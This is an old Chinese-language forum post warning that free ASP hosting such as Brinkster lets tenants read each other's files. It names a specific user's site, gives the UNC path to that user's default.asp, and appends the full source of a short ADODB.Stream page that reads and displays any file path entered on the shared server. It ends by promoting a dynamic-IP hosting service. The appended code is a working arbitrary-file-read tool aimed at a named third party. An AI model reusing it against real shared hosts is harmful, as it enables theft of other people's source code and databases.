【閒聊】免費ASP空間的迷思
 

你還在使用免費ASP空間嗎?
其實免費空間的安全性是非常非常的低的,舉個例子,以大家最常用的[url]www.brinkster.com來說吧,[/url]
你知道嗎,要從免費空間獲取他人的程式碼,甚至資料庫都是輕而易舉的,簡單到只要有一點點的ASP基礎就能辦到
空口無憑,以這個網站為例:
[url]http://www10.brinkster.com/tskoda/Default.asp[/url]
也許他辛辛苦苦的寫了很久的ASP,但是其他的使用這只需要用不到20行的程式碼就能輕易的將原始碼抓回修改,甚至公開販賣
原始碼抓取程式:
[url]http://www10.brinkster.com/ggyyggy/stream.asp[/url]
在Input PhysicalPath中輸入 \\genfs1\www10\tskoda\default.asp

只需一個Stream元件就能將您的心血化為公有財產,您還敢使用免費空間嗎?
建議大家改用動態IP來架站吧,別再讓你的心血變成公共財了~
申請動態IP架站 [url]http://www.dslcity.net[/url]

附錄:( Stream.asp的Source Code )
<% if request("B1") = "送出" then
Dim Stream:
Set Stream = server.CreateObject("ADODB.Stream")
Stream.Charset = "ascii"
Stream.Open
Stream.LoadFromFile request("T1")
GetFile = Stream.Readtext
response.write Server.HTMLEncode(GetFile)
Stream.Close
else %>
<html>
<head></head>
<title>原始碼抓取 By Maxtk</title>
<body>
<form method="POST">
<p>系統路徑為 : <%=request.servervariables("appl_physical_path")%></p>
<p><input type="text" name="T1" size="20"> Input PhysicalPath <input type="submit" value="送出" name="B1"><input type="reset" value="取消" name="B2"></p>
</form>
</body></html>
<% end if %>